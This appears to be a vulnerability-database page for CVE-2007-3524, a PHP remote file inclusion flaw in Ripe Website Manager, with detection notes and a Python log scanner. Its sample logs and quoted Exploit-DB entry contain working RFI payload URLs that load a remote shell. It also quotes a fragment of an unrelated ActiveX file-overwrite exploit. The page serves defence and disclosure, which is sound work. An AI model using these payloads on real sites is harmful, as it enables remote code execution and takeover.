CVE-2007-3524
Published 2007-07-03
Priority: P3 51 · CVSS 2.0: 6.8 (medium), vector AV:N/AC:M/Au:N/C:P/I:P/A:P
Tags: EXPLOIT
EPSS: 64.20% (99.1th percentile)
Multiple PHP remote file inclusion vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the level parameter to (1) admin/includes/author_panel_header.php or (2) admin/includes/admin_header.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ripe_website_manager | ripe_website_manager | <= 0.8.9 | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests targeting the `level` parameter in the two vulnerable PHP scripts for values containing a URL (remote file inclusion pattern), particularly those ending with `?` to nullify the appended extension.
- The RFI payload appends a trailing `?` to the injected URL (e.g., `level=shell.txt?`) to neutralise any suffix appended by the include statement; look for this pattern in web server logs.
- The vulnerability affects Ripe Website Manager version 0.8.9 and earlier only; verify the installed version before applying detection rules to avoid false positives on patched installations.
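As an added illustration of the detection notes above (this is not code from the page, its sources, or the Ripe Website Manager project): a small Python scanner that walks common-log-format web server lines, picks out requests to the two scripts named in the advisory, and flags any `level` value that carries a URL scheme or the trailing `?` suffix-nulling trick. The script paths and the parameter name come from the advisory; the log lines, IP addresses, log format and the "high"/"medium" confidence labels are constructed assumptions for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Hypothetical defensive log scanner for the RFI pattern in this advisory.
# Script paths and parameter name are from the advisory; the rest is constructed.
VULNERABLE_SCRIPTS = (
    "/admin/includes/author_panel_header.php",
    "/admin/includes/admin_header.php",
)
INCLUDED_PARAM = "level"

# Common log format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# PHP's include() will fetch remote content over these schemes when allow_url_include is on.
REMOTE_SCHEME_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def classify_request(target):
    """Inspect one request target; return a finding dict when the `level` value
    looks like remote file inclusion, otherwise None."""
    parsed = urlparse(target)
    if not parsed.path.endswith(VULNERABLE_SCRIPTS):
        return None
    # keep_blank_values keeps a bare 'level=' visible; parse_qs already %-decodes once.
    values = parse_qs(parsed.query, keep_blank_values=True).get(INCLUDED_PARAM, [])
    for value in values:
        value = unquote(value)  # second pass catches double-encoded payloads
        indicators = []
        if REMOTE_SCHEME_RE.match(value):
            indicators.append("remote-url")
        if value.endswith("?"):
            indicators.append("trailing-question-mark")
        if indicators:
            # Both indicators together are the exact payload shape from the advisory.
            confidence = "high" if len(indicators) == 2 else "medium"
            return {
                "script": parsed.path,
                "value": value,
                "indicators": indicators,
                "confidence": confidence,
            }
    return None


def scan_log(lines):
    """Parse common-log-format lines and collect findings for matching requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(client=m.group("client"), time=m.group("time"),
                           status=m.group("status"))
            findings.append(finding)
    return findings


# Constructed sample log lines (documentation-range IP addresses, fictional host).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jul/2007:10:15:02 +0000] "GET /cms/admin/includes/author_panel_header.php?level=http://198.51.100.9/shell.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [03/Jul/2007:10:15:05 +0000] "GET /cms/admin/includes/admin_header.php?level=http%3A%2F%2F198.51.100.9%2Fshell.txt%3F HTTP/1.1" 200 510',
    '192.0.2.4 - - [03/Jul/2007:10:16:40 +0000] "GET /cms/admin/includes/admin_header.php?level=author HTTP/1.1" 200 1024',
    '192.0.2.4 - - [03/Jul/2007:10:16:41 +0000] "GET /cms/admin/includes/admin_header.php?level=author? HTTP/1.1" 200 1024',
    '192.0.2.4 - - [03/Jul/2007:10:17:00 +0000] "GET /cms/index.php?page=http://198.51.100.9/x.txt HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['confidence']:6} {f['client']:12} {f['script']} level={f['value']!r} {f['indicators']}")
```

The third line of the sample log (a plain `level=author`) and the last one (a URL in a parameter of an unrelated script) are deliberately left unflagged: the scanner keys on the two advisory scripts plus the parameter, not on any URL anywhere, which is what keeps the false-positive rate workable. As the third detection note says, scope the rule to hosts running 0.8.9 or earlier.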
No detection rules found.
Exploit-DB · 2007-06-30
Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion (CVE-2007-3524)
---
#Author:: BlackNDoor | [email protected]
#Homepage:: www.learntohell.net
#
#Script:: Ripe Website Manager
#Version:: Files:
/admin/includes/author_panel_header.php
/admin/includes/admin_header.php
-> vulncode:
#Exploit::
http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?
#thanks:: str0ke
# milw0rm.com [2007-06-30]
Exploit-DB · 2007-06-12
TEC-IT TBarCode - OCX ActiveX Arbitrary File Overwrite (indexed under CVE-2007-3233, a different issue)
---
TEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) "SaveImage()" Remote Arbitrary File Overwrite
url: http://www.tec-it.com/asp/main/startfr.asp?LN=1
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.
THE EXPLOIT WILL OVERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUNNING THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
All software that uses this OCX is vulnerable to this exploit.
Sub tryMe
On Error Resume Next
Dim MyMsg
If(MsgBox("This was written for educational purpos
No writeups or analysis indexed.
References:
- http://osvdb.org/37799
- http://osvdb.org/37800
- http://secunia.com/advisories/25898
- http://www.securityfocus.com/bid/24722
- http://www.vupen.com/english/advisories/2007/2407
- https://exchange.xforce.ibmcloud.com/vulnerabilities/35188
- https://www.exploit-db.com/exploits/4129